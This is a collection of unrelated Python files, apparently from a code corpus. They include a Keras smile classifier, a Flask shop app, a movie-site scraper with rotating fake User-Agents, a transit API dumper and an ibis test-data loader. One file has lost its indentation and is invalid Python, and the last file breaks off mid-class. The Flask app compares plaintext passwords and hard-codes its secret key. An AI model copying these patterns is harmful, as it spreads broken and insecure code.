    print('Data len: ', len((C1files)))
    # Labels: one float per image, one-hot encoded to 2 columns.
    labels = np_utils.to_categorical(np.loadtxt(r'''D:\TUT\aspl\4\labels.txt''' ), 2)
    # Images: min-shifted and scaled by the per-image maximum.
    imlist = []
    for path in C1files:
        img = np.array(image.load_img(path))
        imlist.append((img - np.amin(img)) / np.amax(img))
    return imlist, labels
X, y = load_GE()
num_classes = 2

# Data generator and augmentations
datag = ImageDataGenerator(
    featurewise_center=False,
    featurewise_std_normalization=False,
    rotation_range=45,
    width_shift_range=0.3,
    height_shift_range=0.3,
)

# BUG FIX: the original shuffled undefined names (imlist/labels) and called
# datag.fit(X_train) before X_train existed. Shuffle X/y, split, then fit.
data = list(zip(X, y))
random.shuffle(data)
X, y = zip(*data)
X = np.array(X)
y = np.array(y)
X_train, X_test, y_train, y_test = train_test_split(X, y)
datag.fit(X_train)

# Model construction: three Conv/BN/pool/dropout stages, then a dense head.
model = Sequential()
N = 32
w, h = 5, 5
model.add(Conv2D(N, (w, h),
                 input_shape=(64, 64, 3),
                 activation='relu',
                 padding='same'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.5))
model.add(Conv2D(64, (w, h),
                 activation='relu',
                 padding='same'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.5))
model.add(Conv2D(128, (w, h),
                 activation='relu',
                 padding='same'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.5))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
print(model.summary())

# Learning: train one augmented epoch at a time until 90% test accuracy
# or 50 epochs.
model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
batch_size = 32  # BUG FIX: was referenced below without ever being defined
epoch_counter = 1
while True:
    print(' * Epoch ' + str(epoch_counter) + ' * ')
    for X_batch, y_batch in datag.flow(X_train, y_train, batch_size=X_train.shape[0]):
        X_batch = X_batch / 255.0
        # BUG FIX: train on the augmented batch; the original fit on X_train,
        # silently discarding the augmentation it just generated.
        model.fit(X_batch, y_batch, batch_size,
                  epochs=1,
                  verbose=1,
                  validation_split=0.15,
                  shuffle=True)
        break
    acc = model.evaluate(X_test, y_test, verbose=0)
    print('Accuracy [loss, acc]: ' + str(acc))
    if acc[1] > 0.90 or epoch_counter >= 50:
        break
    epoch_counter += 1

# Persist architecture (JSON) and weights (HDF5).
model_json = model.to_json()
with open("model.json", "w") as json_file:
    json_file.write(model_json)
model.save_weights("model.h5")

# Evaluation: reload the persisted model and score it on the held-out split.
with open('model.json', 'r') as json_file:
    loaded_model_json = json_file.read()
loaded_model = model_from_json(loaded_model_json)
loaded_model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
loaded_model.load_weights("model.h5")
score = loaded_model.evaluate(X_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])

confusion_matrix = np.zeros((2, 2))
for X_sample, y_sample in zip(X_test, y_test):
    # BUG FIX: predict() expects a batch dimension -> (1, 64, 64, 3).
    result = loaded_model.predict(X_sample.reshape(1, 64, 64, 3))
    confusion_matrix[np.argmax(y_sample), np.argmax(result[0])] += 1
# BUG FIX: 'str' + ndarray raised TypeError; pass as separate print args.
print('Confusion Matrix', confusion_matrix)

# Results visualization: show the first 21 test images with predictions.
for i, (X_sample, y_sample) in enumerate(zip(X_test, y_test)):
    plt.imshow(X_sample)
    plt.show()
    print('prediction: ', model.predict(X_sample.reshape(1, 64, 64, 3)))
    print('ground true:', y_sample)
    if i == 20:
        break
# Play Video
def logVideoMetadata(video):
    """Print every OpenCV capture property of *video*, one per line."""
    properties = (
        ('current pose: ', cv2.CAP_PROP_POS_MSEC),
        ('0-based index: ', cv2.CAP_PROP_POS_FRAMES),
        ('pose: ', cv2.CAP_PROP_POS_AVI_RATIO),
        ('width: ', cv2.CAP_PROP_FRAME_WIDTH),
        ('height: ', cv2.CAP_PROP_FRAME_HEIGHT),
        ('fps: ', cv2.CAP_PROP_FPS),
        ('codec: ', cv2.CAP_PROP_FOURCC),
        ('frame count: ', cv2.CAP_PROP_FRAME_COUNT),
        ('format: ', cv2.CAP_PROP_FORMAT),
        ('mode: ', cv2.CAP_PROP_MODE),
        ('brightness: ', cv2.CAP_PROP_BRIGHTNESS),
        ('contrast: ', cv2.CAP_PROP_CONTRAST),
        ('saturation: ', cv2.CAP_PROP_SATURATION),
        ('hue: ', cv2.CAP_PROP_HUE),
        ('gain: ', cv2.CAP_PROP_GAIN),
        ('exposure: ', cv2.CAP_PROP_EXPOSURE),
        ('convert_rgb: ', cv2.CAP_PROP_CONVERT_RGB),
        ('rect: ', cv2.CAP_PROP_RECTIFICATION),
        ('iso speed: ', cv2.CAP_PROP_ISO_SPEED),
        ('buffersize: ', cv2.CAP_PROP_BUFFERSIZE),
    )
    for label, prop in properties:
        print(label + str(video.get(prop)))
def hot_ent_to_text(prediction):
    """Translate a 1x2 softmax row into its class label and echo the raw row."""
    print(prediction)
    return 'NON-SMILE' if prediction[0, 0] > prediction[0, 1] else 'SMILE'
# Play the recorded movie and classify every 20th frame with the trained model.
video = cv2.VideoCapture()
video_path = './smile_movie.MOV'
video.open(video_path)
if not video.isOpened():
    # NOTE(review): only warns -- the script still falls through and will fail
    # on read(); consider aborting here.
    print('Error: unable to open video: ' + video_path)
logVideoMetadata(video)
resize_ratio = 0.125  # NOTE(review): unused below
roi = [150,550,800,800]  # crop region: [y, x, height, width]
blur_kernel_size = 5
total_frames = int(video.get(cv2.CAP_PROP_FRAME_COUNT) )
for i in range(total_frames):
    # NOTE(review): `ret` (read-success flag) is ignored.
    ret, orig_img = video.read()
    if i%20 != 0:
        continue
    # Crop, blur, downscale to the model's 64x64 input, convert BGR->RGB, flip.
    img = orig_img[roi[0]:roi[0]+roi[2],roi[1]:roi[1]+roi[3]]
    img = cv2.blur(img, (blur_kernel_size,blur_kernel_size))
    img = cv2.resize(img, (64, 64), interpolation=cv2.INTER_CUBIC)
    img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
    img = cv2.flip( img, 0 )
    plt.imshow(img)
    plt.show()
    prediction = model.predict(img.reshape(1,64,64,3))
    print(hot_ent_to_text(prediction))
    print(30*'*')
|
991,284 | 56bde6d86ae34dc7cb3d4cb42ae11342b9649c3f | class Solution:
def stoneGameIII(self, stoneValue):
length = len(stoneValue)
alice, bob = 0, 0
alice_total, bob_total = 0, 0
turn = "alice"
while True:
if alice >= length or bob >= length:
break
if turn == "alice":
tmp = 0
local_max = None
local_max_id = None
for i in range(alice, min(alice+3, length)):
value = stoneValue[i]
tmp = tmp + value
if local_max is None:
local_max = tmp
local_max_id = i
elif tmp > local_max:
local_max = tmp
local_max_id = i
if local_max:
alice_total = alice_total + local_max
bob = local_max_id + 1
turn = "bob"
if turn == "bob":
tmp = 0
local_max = None
local_max_id = None
for i in range(bob, min(bob+3, length)):
value = stoneValue[i]
tmp = tmp + value
if local_max is None:
local_max = tmp
local_max_id = i
elif tmp > local_max:
local_max = tmp
local_max_id = i
if local_max:
bob_total = bob_total + local_max
alice = local_max_id + 1
turn = "alice"
print(alice_total, bob_total)
if alice_total > bob_total:
return "Alice"
elif alice_total < bob_total:
return "Bob"
else:
return "Tie"
|
991,285 | be5dab1bc460e1433de160348344f77ce2530aa4 | import csv
import requests
from fake_useragent import UserAgent
from lxml import etree
from time import sleep
from random import randint
def get_html(url):
    """Fetch *url* with a random User-Agent.

    Sleeps 5-8 s after each request to throttle the crawl; returns the decoded
    body on HTTP 200, otherwise the string 'error'.
    """
    ua = UserAgent(path="C:/Users/Hanrey/Desktop/ua.json")
    headers = {'User-Agent': str(ua.random)}
    response = requests.get(url, headers=headers)
    response.encoding = 'utf-8'
    sleep(randint(5,8))
    if response.status_code != 200:
        return 'error'
    return response.text
def parse_index(html):
    """Extract movie detail-page paths from a listing page and expand them to
    absolute maoyan.com URLs."""
    tree = etree.HTML(html)
    all_url = tree.xpath('//div[@class="channel-detail movie-item-title"]/a/@href')
    print(all_url)
    result = []
    for url in all_url:
        result.append('https://maoyan.com{}'.format(url))
    return result
def parse_grade(html):
    """Collect the movie scores from a listing page.

    Each score is rendered as an integer part and a fraction part; the two
    are concatenated (e.g. '9' + '.5' -> '9.5').
    """
    tree = etree.HTML(html)
    grade_int = tree.xpath('//div[@class="channel-detail channel-detail-orange"]/i[@class="integer"]/text()')
    grade_fra = tree.xpath('//div[@class="channel-detail channel-detail-orange"]/i[@class="fraction"]/text()')
    # FIX: zip the two node lists instead of indexing grade_int by
    # grade_fra's length, which raised IndexError whenever the page had
    # more fraction nodes than integer nodes.
    return ["%s%s" % (whole, frac) for whole, frac in zip(grade_int, grade_fra)]
def parse_info(html):
    """Scrape name, genre, country and release time from a movie detail page.

    Each value is the raw xpath node list; cleaning happens in main().
    """
    tree = etree.HTML(html)
    return {
        "name": tree.xpath('//h1[@class="name"]/text()'),
        "type": tree.xpath('//li[@class="ellipsis"][1]/a[@class="text-link"]/text()'),
        "country": tree.xpath('//li[@class="ellipsis"][2]/text()'),
        "time": tree.xpath('//li[@class="ellipsis"][3]/text()'),
    }
def main():
    """Crawl maoyan.com listing pages, scrape each movie's details and score,
    and append the cleaned rows to movie_info.csv.

    FIXES vs the original:
    - the CSV header and all accumulated rows were re-written on every page
      iteration, duplicating output massively; the file is now written once
      after the crawl;
    - the grade index only advanced on successfully-parsed movies, so one
      skipped movie shifted every later grade; enumerate() keeps the detail
      list and the grade list aligned.
    """
    pages = 10  # number of listing pages to crawl (30 movies per page)
    header = ['name', 'type', 'country', 'time', 'grade']
    datas = []
    for offset in range(0, 30 * pages, 30):
        index_url = 'https://maoyan.com/films?showType=3&sortId=3&offset=' + str(offset)
        html = get_html(index_url)
        grade = parse_grade(html)          # scores, parallel to the detail list
        detail_urls = parse_index(html)
        for pos, url in enumerate(detail_urls):
            detail_html = get_html(url)
            moive = parse_info(detail_html)
            moive['grade'] = grade[pos]
            if moive['name'] != []:        # data cleaning
                moive['name'] = moive['name'][0]
                # Keep only the first country and strip list/quote artifacts.
                moive['country'] = str(moive['country']).split('/')[0].strip("['").strip().strip("\\n").strip()
                moive['time'] = moive['time'][0]
                datas.append(moive)
                print(moive)
            else:
                print("数据丢失!")
    with open("movie_info.csv", 'a', newline='', encoding='utf-8') as csv_file:
        writer = csv.DictWriter(csv_file, fieldnames=header)
        writer.writeheader()
        writer.writerows(datas)


if __name__ == '__main__':
    main()
991,286 | 65de37eada91a75cc02b863dbdbe15d59d769d1e | from flask import Flask,render_template,request,redirect,url_for,session
from model import check_user,add_user_Todb,check_product,addproduct_todb
app = Flask(__name__)
# Secret key signs the session cookie; a hard-coded 'hello' is acceptable only
# for local development -- use a random secret in production.
app.secret_key = 'hello'
@app.route('/')
@app.route('/home')
def home():
    """Landing page; reachable at both '/' and '/home'."""
    return render_template('home.html',title = 'home')

@app.route('/about')
def about():
    """Static about page."""
    return render_template('about.html',title='about')

@app.route('/contact')
def contact():
    """Static contact page."""
    return render_template('contact.html',title='contact')
@app.route('/signup', methods=['GET', 'POST'])
def signup():
    """Register a new user from the signup form.

    Validates that the two password fields match and that the username is
    not already taken, then persists the user and redirects home.
    """
    if request.method == 'POST':
        userinfo = {
            'username': request.form['username'],
            'fullname': request.form['fullname'],
            'password': request.form['password1'],
            'email': request.form['email'],
            'type': request.form['type'],
        }
        if userinfo['password'] != request.form['password2']:
            # FIX: corrected the garbled user-facing message ("dint mantch").
            return "Password fields didn't match"
        # FIX: single DB lookup; `bool(x) is True` was a redundant idiom.
        if check_user(userinfo['username']):
            return "user already exists.try logging in"
        add_user_Todb(userinfo)
    return redirect(url_for('home'))
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Authenticate a user and populate the session.

    On success, stores username and account type in the session and
    redirects home; otherwise reports a failure message.
    """
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        user = check_user(username)  # FIX: one DB lookup instead of three
        if user and user['password'] == password:
            session['username'] = username
            session['type'] = user['type']
            return redirect(url_for('home'))
        # FIX: corrected the typo "is in correct".
        return "username or password is incorrect"
    return redirect(url_for('home'))
@app.route('/logout')
def logout():
    """Drop all session data (username and type) and return to the home page."""
    session.clear()
    return redirect(url_for('home'))
# @app.route('/login',methods =['GET','POST'])
# def login():
# if request.method =='POST':
# db = {'newuser' :'12345','Testuser':'12345'}
# username = request.form['username']
# password = request.form['password']
# if username in db and db[username] == password:
# return redirect(url_for('about'))
# return "username and password is incorrect"
@app.route('/products', methods=['GET', 'POST'])
def products():
    """Add a product listed by the logged-in user, then show the products page."""
    if request.method == 'POST':
        productinfo = {
            'pname': request.form['pname'],
            'price': request.form['price'],
            'description': request.form['description'],
            'seller': session['username'],
        }
        if check_product(productinfo['pname']):
            return "Product already in cart"
        addproduct_todb(productinfo)
    return redirect(url_for('products'))


if __name__ == '__main__':
    app.run(debug=True)
991,287 | 7b480b508fc082bd44699b3765985666f6a32593 | # r/dailyprogrammer
# easy #380
# Smooshed Morse Code 1
# write Moorse code generator
def smorse(text):
    """Print and return the smooshed (separator-free) Morse encoding of *text*.

    *text* is lowercased first; raises KeyError for characters outside a-z
    (digits, spaces, punctuation), matching the original behavior. The
    encoded string is now also returned (backward-compatible: the original
    returned None, which no caller used).
    """
    code = {
        'a': '.-', 'b': '-...', 'c': '-.-.', 'd': '-..', 'e': '.',
        'f': '..-.', 'g': '--.', 'h': '....', 'i': '..', 'j': '.---',
        'k': '-.-', 'l': '.-..', 'm': '--', 'n': '-.', 'o': '---',
        'p': '.--.', 'q': '--.-', 'r': '.-.', 's': '...', 't': '-',
        'u': '..-', 'v': '...-', 'w': '.--', 'x': '-..-', 'y': '-.--',
        'z': '--..',
    }
    text = text.lower()
    # FIX: encode via join over the characters instead of indexing with
    # range(len(text)); also drop the dead commented-out "first version".
    encoded = ''.join(code[ch] for ch in text)
    print(text, "==> ", end='')
    print(encoded)
    return encoded


smorse("sos")
smorse("daily")
smorse("programmer")
smorse("bits")
smorse("three")
|
991,288 | 375dba8ce959807684362b295f5a624259d62236 | import requests
import json
## Swiftly API URLS
routes_url = 'http://api.transitime.org/api/v1/key/dca04420/agency/san-joaquin/command/routes?format=json'
route_details_url = 'http://api.transitime.org/api/v1/key/dca04420/agency/san-joaquin/command/routesDetails?r='
times_vert_url = 'http://api.transitime.org/api/v1/key/dca04420/agency/san-joaquin/command/scheduleVertStops?r='
times_hori_url = 'http://api.transitime.org/api/v1/key/dca04420/agency/san-joaquin/command/scheduleHorizStops?r='
file_type = '.json'
json_root = '/Users/Macbook/Documents/RTD/departureScreen/json/'

# Fetch the route list once (FIX: the original downloaded the same URL twice,
# once for the file dump and once for the ID extraction).
list_data = requests.get(routes_url).json()
with open(json_root + 'route_list/routes.json', 'w') as route_list_file:
    json.dump(list_data, route_list_file, indent=4)

# All current route IDs in service.
routes = [route_id['id'] for route_id in list_data['routes']]

# For every route, fetch and dump its details plus the vertical and
# horizontal timetables.
for route in routes:
    for base_url, subdir in ((route_details_url, 'route_details/'),
                             (times_vert_url, 'times_vert/'),
                             (times_hori_url, 'times_hori/')):
        data = requests.get(base_url + route + '&format=json').json()
        with open(json_root + subdir + route + file_type, 'w') as out_file:
            json.dump(data, out_file, indent=4)
991,289 | 010f53728ccc228fcd3a07477b315c4b1f2298b2 | from itertools import chain, takewhile, dropwhile
from itertools import combinations, permutations
# Small itertools demo. NOTE: uses Python 2 print statements -- this module
# only runs under Python 2.
a = [1, 2, 3]
b = 'abc'
# chain: iterate both sequences back to back, preserving element types.
print [(x, type(x)) for x in chain(a, b)]
# All 2-character combinations (order-insensitive) and permutations (ordered).
print [u''.join(x) for x in combinations(b, 2)]
print [u''.join(x) for x in permutations(b, 2)]
# takewhile/dropwhile stop/start at the first element failing the predicate.
print list(takewhile(lambda x: x % 2 == 1, a))
print list(dropwhile(lambda x: x in 'aeiou', b))
|
991,290 | 48828acc1a9417a217bc85d5e4c82312f77c0017 | import math
def cube_volume(side):
    """Return the volume of a cube with edge length *side*."""
    return side ** 3


def sphere_volume(radius):
    """Return the volume of a sphere with the given *radius*."""
    return (4. / 3.) * math.pi * radius ** 3


def _main():
    """Interactive entry point (prompts in Italian, as in the original).

    FIXES: the stray no-op `math.pi` expression was removed, the computation
    is factored into testable functions, and the prompts now only run when
    the file is executed as a script rather than at import time.
    """
    print("Inserire 1 se si vuole calcolare il volume del cubo")
    print("Inserire 2 se si vuole calcolare il volume della sfera")
    s = int(input())
    if s == 1:
        l = int(input("Inserire il lato del cubo "))
        print("Il volume del cubo e ", cube_volume(l))
    elif s == 2:
        r = int(input("Inserire il raggio della sfera "))
        print("Il volume della sfera e ", sphere_volume(r))
    else:
        print("ERRORE")


if __name__ == '__main__':
    _main()
991,291 | b2afd36bf2dd6e651fce7110f7baf9f9d716050c | from django.shortcuts import render_to_response
from django.template import RequestContext
def contato(request):
    """Render the contact page with the local scope as template context.

    NOTE(review): render_to_response with context_instance is a legacy
    (pre-Django 1.10) API; modern code would use django.shortcuts.render.
    """
    return render_to_response(
        'contato.html',
        locals(),
        context_instance=RequestContext(request),
    )
991,292 | 08704c3de92db48b535b8ac83b24ed9cbbe5a089 | #!/usr/bin/env python
import os
import getpass
import tempfile
import tarfile
import operator
import sqlalchemy as sa
import numpy as np
import pandas as pd
import click
try:
import sh
except ImportError:
import pbs as sh
@click.group()
def cli():
    """Entry point grouping the per-backend test-data loading commands."""
    pass
@cli.command()
@click.argument('tables', nargs=-1)
@click.option('-S', '--script', type=click.File('rt'), required=True)
@click.option(
    '-d', '--database',
    default=os.environ.get('IBIS_TEST_CLICKHOUSE_DB', 'ibis_testing')
)
@click.option(
    '-D', '--data-directory',
    default=tempfile.gettempdir(), type=click.Path(exists=True)
)
def clickhouse(script, tables, database, data_directory):
    """Load test data into ClickHouse.

    Drops and recreates *database*, runs the DDL in *script* one statement at
    a time (the driver cannot execute multi-statement strings), then
    bulk-loads each table's CSV from *data_directory*, coercing the dtypes
    the ClickHouse driver needs.
    """
    # Connection settings come from the environment with sensible defaults.
    username = os.environ.get('IBIS_CLICKHOUSE_USER', 'default')
    host = os.environ.get('IBIS_CLICKHOUSE_HOST', 'localhost')
    password = os.environ.get('IBIS_CLICKHOUSE_PASS', '')
    url = sa.engine.url.URL(
        'clickhouse+native',
        username=username,
        host=host,
        password=password,
    )
    engine = sa.create_engine(str(url))
    engine.execute('DROP DATABASE IF EXISTS "{}"'.format(database))
    engine.execute('CREATE DATABASE "{}"'.format(database))
    # Reconnect scoped to the freshly created database.
    url = sa.engine.url.URL(
        'clickhouse+native',
        username=username,
        host=host,
        password=password,
        database=database,
    )
    engine = sa.create_engine(str(url))
    script_text = script.read()
    # missing stmt
    # INSERT INTO array_types (x, y, z, grouper, scalar_column) VALUES
    #     ([1, 2, 3], ['a', 'b', 'c'], [1.0, 2.0, 3.0], 'a', 1.0),
    #     ([4, 5], ['d', 'e'], [4.0, 5.0], 'a', 2.0),
    #     ([6], ['f'], [6.0], 'a', 3.0),
    #     ([1], ['a'], [], 'b', 4.0),
    #     ([2, 3], ['b', 'c'], [], 'b', 5.0),
    #     ([4, 5], ['d', 'e'], [4.0, 5.0], 'c', 6.0);
    with engine.begin() as con:
        # doesn't support multiple statements
        for stmt in script_text.split(';'):
            if len(stmt.strip()):
                con.execute(stmt)
    table_paths = [
        os.path.join(data_directory, '{}.csv'.format(table))
        for table in tables
    ]
    dtype = {'bool_col': np.bool_}
    for table, path in zip(tables, table_paths):
        # correct dtypes per table to be able to insert
        # TODO: cleanup, kinda ugly
        df = pd.read_csv(path, index_col=None, header=0, dtype=dtype)
        if table == 'functional_alltypes':
            df = df.rename(columns={'Unnamed: 0': 'Unnamed_0'})
            cols = ['date_string_col', 'string_col']
            df[cols] = df[cols].astype(str)
            df.timestamp_col = df.timestamp_col.astype('datetime64[s]')
        elif table == 'batting':
            cols = ['playerID', 'teamID', 'lgID']
            df[cols] = df[cols].astype(str)
            # ClickHouse has no NULL-able numeric defaults here: fill NaNs
            # with 0 and store the float columns as ints.
            cols = df.select_dtypes([float]).columns
            df[cols] = df[cols].fillna(0).astype(int)
        elif table == 'awards_players':
            cols = ['playerID', 'awardID', 'lgID', 'tie', 'notes']
            df[cols] = df[cols].astype(str)
        df.to_sql(table, engine, index=False, if_exists='append')
@cli.command()
@click.argument('tables', nargs=-1)
@click.option('-S', '--script', type=click.File('rt'), required=True)
@click.option(
    '-d', '--database',
    default=os.environ.get(
        'IBIS_TEST_POSTGRES_DB', os.environ.get('PGDATABASE', 'ibis_testing')
    ),
)
@click.option(
    '-D', '--data-directory',
    default=tempfile.gettempdir(), type=click.Path(exists=True)
)
def postgres(script, tables, database, data_directory):
    """Load the test dataset into a PostgreSQL server.

    Drops and recreates *database*, executes the DDL *script*, then
    appends each ``<table>.csv`` from *data_directory* via pandas.
    Connection settings come from IBIS_*/PG* environment variables.
    """
    username = os.environ.get(
        'IBIS_POSTGRES_USER', os.environ.get('PGUSER', getpass.getuser())
    )
    host = os.environ.get('PGHOST', 'localhost')
    password = os.environ.get('IBIS_POSTGRES_PASS', os.environ.get('PGPASS'))
    # CREATE/DROP DATABASE cannot run inside a transaction, hence the
    # AUTOCOMMIT isolation level on this first, database-less engine.
    url = sa.engine.url.URL(
        'postgresql',
        username=username,
        host=host,
        password=password,
    )
    engine = sa.create_engine(str(url), isolation_level='AUTOCOMMIT')
    engine.execute('DROP DATABASE IF EXISTS "{}"'.format(database))
    engine.execute('CREATE DATABASE "{}"'.format(database))
    # Reconnect scoped to the new database for schema + data loading.
    url = sa.engine.url.URL(
        'postgresql',
        username=username,
        host=host,
        password=password,
        database=database,
    )
    engine = sa.create_engine(str(url))
    script_text = script.read()
    with engine.begin() as con:
        con.execute(script_text)
    table_paths = [
        os.path.join(data_directory, '{}.csv'.format(table))
        for table in tables
    ]
    # Force bool_col to a real boolean dtype so inserts round-trip.
    dtype = {'bool_col': np.bool_}
    for table, path in zip(tables, table_paths):
        df = pd.read_csv(path, index_col=None, header=0, dtype=dtype)
        df.to_sql(table, engine, index=False, if_exists='append')
    # VACUUM FULL also refuses to run in a transaction; fresh autocommit
    # engine for the final maintenance pass.
    engine = sa.create_engine(str(url), isolation_level='AUTOCOMMIT')
    engine.execute('VACUUM FULL ANALYZE')
@cli.command()
@click.argument('tables', nargs=-1)
@click.option('-S', '--script', type=click.File('rt'), required=True)
@click.option(
    '-d', '--database',
    default=os.environ.get('IBIS_TEST_SQLITE_DB_PATH', 'ibis_testing.db')
)
@click.option(
    '-D', '--data-directory',
    default=tempfile.gettempdir(), type=click.Path(exists=True)
)
def sqlite(script, tables, database, data_directory):
    """Load the test dataset into a SQLite database file.

    Removes any existing file at *database*, executes the DDL *script*,
    then appends each ``<table>.csv`` from *data_directory*.
    """
    database = os.path.abspath(database)
    if os.path.exists(database):
        try:
            os.remove(database)
        except OSError:
            # Best effort: e.g. the file is held open elsewhere.
            pass
    engine = sa.create_engine('sqlite:///{}'.format(database))
    script_text = script.read()
    with engine.begin() as con:
        # executescript() on the raw DBAPI connection runs the whole
        # multi-statement DDL in one call.
        con.connection.connection.executescript(script_text)
    table_paths = [
        os.path.join(data_directory, '{}.csv'.format(table))
        for table in tables
    ]
    click.echo(tables)
    click.echo(table_paths)
    for table, path in zip(tables, table_paths):
        df = pd.read_csv(path, index_col=None, header=0)
        with engine.begin() as con:
            df.to_sql(table, con, index=False, if_exists='append')
    engine.execute('VACUUM')
    # BUG FIX: 'VACUUM ANALYZE' is PostgreSQL syntax; SQLite rejects it.
    # VACUUM already ran above, so just collect optimizer statistics.
    engine.execute('ANALYZE')
# Resolve the curl binary once at import time: AppVeyor CI (Windows)
# ships curl at a fixed path; everywhere else use the one on $PATH.
if os.environ.get('APPVEYOR', None) is not None:
    curl = sh.Command('C:\\Tools\\curl\\bin\\curl.exe')
else:
    curl = sh.curl
@cli.command()
@click.argument(
    'base_url',
    required=False,
    default='https://storage.googleapis.com/ibis-ci-data'  # noqa: E501
)
@click.option('-d', '--data', multiple=True)
@click.option('-D', '--directory', default='.', type=click.Path(exists=False))
def download(base_url, data, directory):
    """Fetch test-data archives with curl and unpack any tarballs.

    Each entry in *data* is downloaded from ``<base_url>/<name>`` into
    *directory*; tar archives are then extracted in place.
    """
    if not data:
        # Default payload (single-element tuple).
        data = 'ibis-testing-data.tar.gz',
    if not os.path.exists(directory):
        os.mkdir(directory)
    for piece in data:
        data_url = '{}/{}'.format(base_url, piece)
        path = os.path.join(directory, piece)
        # -L follows redirects; stream curl's stdout/stderr through click.
        curl(
            data_url, o=path, L=True,
            _out=click.get_binary_stream('stdout'),
            _err=click.get_binary_stream('stderr'),
        )
        if piece.endswith(('.tar', '.gz', '.bz2', '.xz')):
            # BUG FIX: mode was 'r|gz', which only reads gzip streams and
            # failed for the plain .tar/.bz2/.xz suffixes matched above.
            # 'r|*' makes tarfile detect the compression transparently.
            with tarfile.open(path, mode='r|*') as f:
                f.extractall(path=directory)
def parse_env(ctx, param, values):
    """click callback: turn ``NAME=VALUE`` strings into a dict.

    Raises ClickException for any entry without an '='; later duplicates
    of a name win.
    """
    result = {}
    for item in values:
        name, sep, value = item.partition('=')
        if not sep:
            raise click.ClickException(
                'Environment variables must be of the form NAME=VALUE. '
                '{} is not in this format'.format(item)
            )
        result[name] = value
    return result
@cli.command()
@click.argument('data_directory', type=click.Path(exists=True))
@click.option('-e', '--environment', multiple=True, callback=parse_env)
def env(data_directory, environment):
    """Print NAME=VALUE pairs describing the test environment, one per
    line and sorted by name.  Defaults may be overridden with ``-e``.
    """
    envars = {
        'IBIS_TEST_IMPALA_HOST': 'impala',
        'IBIS_TEST_NN_HOST': 'impala',
        'IBIS_TEST_IMPALA_POST': 21050,
        'IBIS_TEST_WEBHDFS_PORT': 50070,
        'IBIS_TEST_WEBHDFS_USER': 'ubuntu',
        'IBIS_TEST_SQLITE_DB_PATH': os.path.join(
            data_directory, 'ibis_testing.db'
        ),
        'DIAMONDS_CSV': os.path.join(data_directory, 'diamonds.csv'),
        'BATTING_CSV': os.path.join(data_directory, 'batting.csv'),
        'AWARDS_PLAYERS_CSV': os.path.join(
            data_directory, 'awards_players.csv'
        ),
        'FUNCTIONAL_ALLTYPES_CSV': os.path.join(
            data_directory, 'functional_alltypes.csv'
        ),
        'IBIS_TEST_POSTGRES_DB': 'ibis_testing',
        'IBIS_POSTGRES_USER': getpass.getuser(),
        'IBIS_POSTGRES_PASS': '',
    }
    envars.update(environment)
    lines = [
        '{}={}'.format(name, value)
        for name, value in sorted(envars.items())
    ]
    click.echo('\n'.join(lines))
# Script entry point: dispatch to one of the click sub-commands above.
if __name__ == '__main__':
    cli()
|
991,293 | 77664bc81bc81721dc376defdceed2f4bf701ad2 | from django.db import models
from datetime import datetime
import json
# Create your models here.
class UtilsManager(models.Manager):
    """Manager with helpers to parse dates and build standard responses."""

    def retornar_fecha(self, fecha=None):
        """Parse `fecha` ('%Y-%m-%d %H:%M:%S') into a datetime.

        Returns Utils.NO_ENCONTRADO when no date string is supplied.
        """
        # `is not None` instead of `!= None`: identity check is the idiom.
        if fecha is not None:
            print('La fecha recibida es: ' + fecha)
            return datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')
        else:
            return Utils.NO_ENCONTRADO

    def definir_respuesta(self, result=None):
        """Build a Resultados from a Utils status code or a model instance.

        Any non-sentinel, non-None value (typically a model instance) is
        treated as success.
        """
        resultado = Resultados()
        try:
            print(result)
            if result == Utils.NO_ENCONTRADO or result is None:
                resultado.status = Utils.NO_ENCONTRADO
                resultado.message = 'Proyecto no encontrado.'
                return resultado
            elif result == Utils.NO_PERMITIDO:
                resultado.status = Utils.NO_PERMITIDO
                resultado.message = 'Operacion invalida.'
                return resultado
            elif result == Utils.ERROR:
                resultado.status = Utils.ERROR
                resultado.message = 'Ocurrio algun error.'
                return resultado
            elif result == Utils.SIN_EFECTOS:
                resultado.status = Utils.SIN_EFECTOS
                resultado.message = 'La operacion no tuvo efectos.'
                return resultado
            elif result == Utils.BAD_REQUEST:
                resultado.status = Utils.BAD_REQUEST
                resultado.message = 'Bad Request.'
                # Falls through to the final return, same net effect as
                # the explicit returns above.
            elif result is not None:
                print('Respuesta exitosa!..')
                resultado.status = Utils.RESPUESTSA_EXITOSA
                resultado.message = 'Respuesta exitosa!..'
                return resultado
            return resultado
        except Exception:
            # Was a bare `except:`; narrowed so KeyboardInterrupt/SystemExit
            # propagate.  Reached when comparing against an object that
            # does not support these comparisons -- presumably a model
            # instance, which is treated as success.
            print('Es una instancia.')
            print(result)
            print('Respuesta exitosa!..')
            resultado.status = Utils.RESPUESTSA_EXITOSA
            resultado.message = 'Respuesta exitosa!..'
            return resultado
class Utils(models.Model):
    """Namespace for the two-letter status codes used in API responses.

    NOTE(review): declares no model fields; it appears to exist only to
    hold the status constants and the custom manager.
    """
    NO_ENCONTRADO = 'NE'       # not found
    ERROR = 'EE'               # generic error
    SIN_EFECTOS = 'SE'         # operation had no effect
    NO_PERMITIDO = 'NP'        # operation not allowed
    RESPUESTSA_EXITOSA = 'RE'  # success (typo kept: name is referenced elsewhere)
    BAD_REQUEST = 'BD'
    # Django choices-style tuple pairing codes with their symbolic names.
    RTA_MET = (
        ('NE', 'NO_ENCONTRADO'),
        ('SE', 'SIN_EFECTOS'),
        ('EE', 'ERROR'),
        ('NP', 'NO_PERMITIDO'),
        ('RE', 'RESPUESTSA_EXITOSA'),
        ('BD', 'BAD_REQUEST'),
    )
    objects = UtilsManager()
class Resultados:
    """Simple status/message response container."""

    # Class-level defaults; __init__ always shadows them per instance.
    status = ''
    message = ''

    def __init__(self, status=None, message=None):
